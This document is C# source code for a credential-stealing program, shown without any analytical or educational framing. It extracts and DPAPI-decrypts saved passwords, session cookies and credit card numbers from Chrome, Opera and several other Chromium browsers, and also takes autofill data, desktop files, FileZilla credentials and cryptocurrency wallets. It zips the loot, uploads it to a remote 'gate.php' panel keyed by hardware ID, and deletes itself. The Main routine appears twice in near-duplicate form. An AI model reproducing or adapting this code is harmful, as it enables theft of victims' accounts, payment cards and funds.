public static List <CookieData> GetCookies() // Works
{
List <CookieData> cookieDataList1 = new List <CookieData>();
string environmentVariable = Environment.GetEnvironmentVariable("LocalAppData");
string[] strArray = new string[7]
{
environmentVariable + "\\Google\\Chrome\\User Data\\Default\\Cookies",
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Opera Software\\Opera Stable\\Cookies",
environmentVariable + "\\Kometa\\User Data\\Default\\Cookies",
environmentVariable + "\\Orbitum\\User Data\\Default\\Cookies",
environmentVariable + "\\Comodo\\Dragon\\User Data\\Default\\Cookies",
environmentVariable + "\\Amigo\\User\\User Data\\Default\\Cookies",
environmentVariable + "\\Torch\\User Data\\Default\\Cookies"
};
foreach (string basePath in strArray)
{
List <CookieData> cookieDataList2 = Browsers.FetchCookies(basePath);
if (cookieDataList2 != null)
{
cookieDataList1.AddRange((IEnumerable <CookieData>)cookieDataList2);
}
}
return(cookieDataList1);
}
private static void Main(string[] args)
{
string dir = Environment.GetEnvironmentVariable("temp") + @"\" + Helper.GetHwid();
string path = dir + @"\Directory";
string str3 = path + @"\Browsers";
string str4 = path + @"\Files";
string str5 = path + @"\Wallets";
Directory.CreateDirectory(path);
Directory.CreateDirectory(str3);
Directory.CreateDirectory(str4);
Directory.CreateDirectory(str5);
string contents = "";
List <PassData> passwords = Browsers.GetPasswords();
foreach (PassData data in passwords)
{
contents = contents + data.ToString();
}
File.WriteAllText(str3 + @"\Passwords.txt", contents);
contents = "";
List <CookieData> cookies = Browsers.GetCookies();
foreach (CookieData data2 in cookies)
{
contents = contents + data2.ToString();
}
File.WriteAllText(str3 + @"\Cookies.txt", contents);
contents = "";
List <CardData> cards = Browsers.GetCards();
foreach (CardData data3 in cards)
{
contents = contents + data3.ToString();
}
File.WriteAllText(str3 + @"\CC.txt", contents);
contents = "";
List <FormData> forms = Browsers.GetForms();
foreach (FormData data4 in forms)
{
contents = contents + data4.ToString();
}
File.WriteAllText(str3 + @"\Autofill.txt", contents);
contents = "";
Files.Desktop(str4);
Files.FileZilla(str4);
int num = Crypto.Steal(str5);
string zipPath = dir + @"\" + Helper.GetHwid() + ".zip";
Helper.Zip(path, zipPath);
Helper.SendFile(string.Format(url + "/gate.php?hwid={0}&pwd={1}&cki={2}&cc={3}&frm={4}&wlt={5}", new object[] { Helper.GetHwid(), passwords.Count, cookies.Count, cards.Count, forms.Count, num }), zipPath);
Helper.SelfDelete(dir, dir + @"\temp.exe");
}
static void Main(string[] args)
{
string dir = Environment.GetEnvironmentVariable("temp") + "\\" + Helper.GetHwid();
string workDir = dir + "\\Directory";
string browserDir = workDir + "\\Browsers";
string filesDir = workDir + "\\Files";
string cryptoDir = workDir + "\\Wallets";
Directory.CreateDirectory(workDir);
Directory.CreateDirectory(browserDir);
Directory.CreateDirectory(filesDir);
Directory.CreateDirectory(cryptoDir);
bool bl = false;
string text = "";
List <PassData> pwd = Browsers.GetPasswords();
foreach (PassData i in pwd)
{
text += i.ToString();
}
File.WriteAllText(browserDir + "\\Passwords.txt", text);
text = "";
List <CookieData> cki = Browsers.GetCookies();
foreach (CookieData i in cki)
{
text += i.ToString();
}
File.WriteAllText(browserDir + "\\Cookies.txt", text);
text = "";
List <CardData> cc = Browsers.GetCards();
foreach (CardData i in cc)
{
text += i.ToString();
}
File.WriteAllText(browserDir + "\\CC.txt", text);
text = "";
List <FormData> frm = Browsers.GetForms();
foreach (FormData i in frm)
{
text += i.ToString();
}
File.WriteAllText(browserDir + "\\Autofill.txt", text);
text = "";
Files.Desktop(filesDir);
Files.FileZilla(filesDir);
int wlt = Crypto.Steal(cryptoDir);
string zipName = dir + "\\" + Helper.GetHwid() + ".zip";
Helper.Zip(workDir, zipName);
Helper.SendFile(string.Format(url + "/gate.php?hwid={0}&pwd={1}&cki={2}&cc={3}&frm={4}&wlt={5}", Helper.GetHwid(), pwd.Count, cki.Count, cc.Count, frm.Count, wlt), zipName);
Helper.SelfDelete(dir, dir + "\\temp.exe");
// //Console.ReadKey();
}
private static List <CardData> FetchCards(string basePath)
{
if (!File.Exists(basePath))
{
return((List <CardData>)null);
}
string str1 = "";
if (basePath.Contains("Chrome"))
{
str1 = "Google Chrome";
}
if (basePath.Contains("Yandex"))
{
str1 = "Yandex Browser";
}
if (basePath.Contains("Orbitum"))
{
str1 = "Orbitum Browser";
}
if (basePath.Contains("Opera"))
{
str1 = "Opera Browser";
}
if (basePath.Contains("Amigo"))
{
str1 = "Amigo Browser";
}
if (basePath.Contains("Torch"))
{
str1 = "Torch Browser";
}
if (basePath.Contains("Comodo"))
{
str1 = "Comodo Browser";
}
try
{
string str2 = Path.GetTempPath() + "/" + Helper.GetRandomString() + ".fv";
if (File.Exists(str2))
{
File.Delete(str2);
}
File.Copy(basePath, str2, true);
SqlHandler sqlHandler = new SqlHandler(str2);
List <CardData> cardDataList = new List <CardData>();
sqlHandler.ReadTable("credit_cards");
/*
* if (sqlHandler.GetRowCount() == 65536)
* return (List<CardData>)null;*/
for (int rowNum = 0; rowNum < sqlHandler.GetRowCount(); ++rowNum)
{
try
{
string empty = string.Empty;
try
{
empty = Encoding.UTF8.GetString(Browsers.DecryptBrowsers(Encoding.Default.GetBytes(sqlHandler.GetValue(rowNum, 4)), (byte[])null));
}
catch (Exception ex)
{
// //Console.WriteLine(ex.ToString());
}
if (empty != "")
{
cardDataList.Add(new CardData()
{
Name = sqlHandler.GetValue(rowNum, 1),
Exp_m = sqlHandler.GetValue(rowNum, 2),
Exp_y = sqlHandler.GetValue(rowNum, 3),
Number = empty,
Billing = sqlHandler.GetValue(rowNum, 9)
});
}
}
catch (Exception ex)
{
// //Console.WriteLine(ex.ToString());
}
}
File.Delete(str2);
return(cardDataList);
}
catch (Exception ex)
{
// //Console.WriteLine(ex.ToString());
return((List <CardData>)null);
}
}
private static List <CookieData> FetchCookies(string basePath)
{
if (!File.Exists(basePath))
{
return((List <CookieData>)null);
}
string str1 = "";
if (basePath.Contains("Chrome"))
{
str1 = "Google Chrome";
}
if (basePath.Contains("Yandex"))
{
str1 = "Yandex Browser";
}
if (basePath.Contains("Orbitum"))
{
str1 = "Orbitum Browser";
}
if (basePath.Contains("Opera"))
{
str1 = "Opera Browser";
}
if (basePath.Contains("Amigo"))
{
str1 = "Amigo Browser";
}
if (basePath.Contains("Torch"))
{
str1 = "Torch Browser";
}
if (basePath.Contains("Comodo"))
{
str1 = "Comodo Browser";
}
try
{
string str2 = Path.GetTempPath() + "/" + Helper.GetRandomString() + ".fv";
if (File.Exists(str2))
{
File.Delete(str2);
}
File.Copy(basePath, str2, true);
SqlHandler sqlHandler = new SqlHandler(str2);
/*if (sqlHandler.GetRowCount() == 65536)
* return (List<CookieData>)null;*/
List <CookieData> cookieDataList = new List <CookieData>();
sqlHandler.ReadTable("cookies");
for (int rowNum = 0; rowNum < sqlHandler.GetRowCount(); ++rowNum)
{
try
{
string empty = string.Empty;
try
{
empty = Encoding.UTF8.GetString(Browsers.DecryptBrowsers(Encoding.Default.GetBytes(sqlHandler.GetValue(rowNum, 12)), (byte[])null));
}
catch (Exception ex)
{
// // //Console.WriteLine(ex.ToString());
}
if (empty != "")
{
cookieDataList.Add(new CookieData()
{
host_key = sqlHandler.GetValue(rowNum, 1),
name = sqlHandler.GetValue(rowNum, 2),
path = sqlHandler.GetValue(rowNum, 4),
expires_utc = sqlHandler.GetValue(rowNum, 5),
secure = sqlHandler.GetValue(rowNum, 6),
value = empty,
});
}
}
catch (Exception ex)
{
// // //Console.WriteLine(ex.ToString());
}
}
File.Delete(str2);
return(cookieDataList);
}
catch (Exception ex)
{
// //Console.WriteLine(ex.ToString());
return((List <CookieData>)null);
}
}
private static List <PassData> FetchPasswords(string basePath)
{
if (!File.Exists(basePath))
{
return((List <PassData>)null);
}
string str1 = "";
if (basePath.Contains("Chrome"))
{
str1 = "Google Chrome";
}
if (basePath.Contains("Yandex"))
{
str1 = "Yandex Browser";
}
if (basePath.Contains("Orbitum"))
{
str1 = "Orbitum Browser";
}
if (basePath.Contains("Opera"))
{
str1 = "Opera Browser";
}
if (basePath.Contains("Amigo"))
{
str1 = "Amigo Browser";
}
if (basePath.Contains("Torch"))
{
str1 = "Torch Browser";
}
if (basePath.Contains("Comodo"))
{
str1 = "Comodo Browser";
}
try
{
string str2 = Path.GetTempPath() + "/" + Helper.GetRandomString() + ".fv";
if (File.Exists(str2))
{
File.Delete(str2);
}
File.Copy(basePath, str2, true);
SqlHandler sqlHandler = new SqlHandler(str2);
List <PassData> passDataList = new List <PassData>();
sqlHandler.ReadTable("logins");
for (int rowNum = 0; rowNum < sqlHandler.GetRowCount(); ++rowNum)
{
try
{
string empty = string.Empty;
try
{
empty = Encoding.UTF8.GetString(Browsers.DecryptBrowsers(Encoding.Default.GetBytes(sqlHandler.GetValue(rowNum, 5)), (byte[])null));
}
catch (Exception ex)
{
}
if (empty != "")
{
passDataList.Add(new PassData()
{
Url = sqlHandler.GetValue(rowNum, 1).Replace("https://", "").Replace("http://", ""),
Login = sqlHandler.GetValue(rowNum, 3),
Password = empty,
Program = str1
});
}
}
catch (Exception ex)
{
// // //Console.WriteLine(ex.ToString());
}
}
File.Delete(str2);
return(passDataList);
}
catch (Exception ex)
{
// // //Console.WriteLine(ex.ToString());
return((List <PassData>)null);
}
}
public static byte[] DecryptBrowsers(byte[] cipherTextBytes, byte[] entropyBytes = null)
{
Browsers.DataBlob pPlainText = new Browsers.DataBlob();
Browsers.DataBlob pCipherText = new Browsers.DataBlob();
Browsers.DataBlob pEntropy = new Browsers.DataBlob();
Browsers.CryptprotectPromptstruct pPrompt = new Browsers.CryptprotectPromptstruct()
{
cbSize = Marshal.SizeOf(typeof(Browsers.CryptprotectPromptstruct)),
dwPromptFlags = 0,
hwndApp = IntPtr.Zero,
szPrompt = (string)null
};
string empty = string.Empty;
try
{
try
{
if (cipherTextBytes == null)
{
cipherTextBytes = new byte[0];
}
pCipherText.pbData = Marshal.AllocHGlobal(cipherTextBytes.Length);
pCipherText.cbData = cipherTextBytes.Length;
Marshal.Copy(cipherTextBytes, 0, pCipherText.pbData, cipherTextBytes.Length);
}
catch (Exception ex)
{
}
try
{
if (entropyBytes == null)
{
entropyBytes = new byte[0];
}
pEntropy.pbData = Marshal.AllocHGlobal(entropyBytes.Length);
pEntropy.cbData = entropyBytes.Length;
Marshal.Copy(entropyBytes, 0, pEntropy.pbData, entropyBytes.Length);
}
catch (Exception ex)
{
}
Browsers.CryptUnprotectData(ref pCipherText, ref empty, ref pEntropy, IntPtr.Zero, ref pPrompt, 1, ref pPlainText);
byte[] destination = new byte[pPlainText.cbData];
Marshal.Copy(pPlainText.pbData, destination, 0, pPlainText.cbData);
return(destination);
}
catch (Exception ex)
{
}
finally
{
if (pPlainText.pbData != IntPtr.Zero)
{
Marshal.FreeHGlobal(pPlainText.pbData);
}
if (pCipherText.pbData != IntPtr.Zero)
{
Marshal.FreeHGlobal(pCipherText.pbData);
}
if (pEntropy.pbData != IntPtr.Zero)
{
Marshal.FreeHGlobal(pEntropy.pbData);
}
}
return(new byte[0]);
}
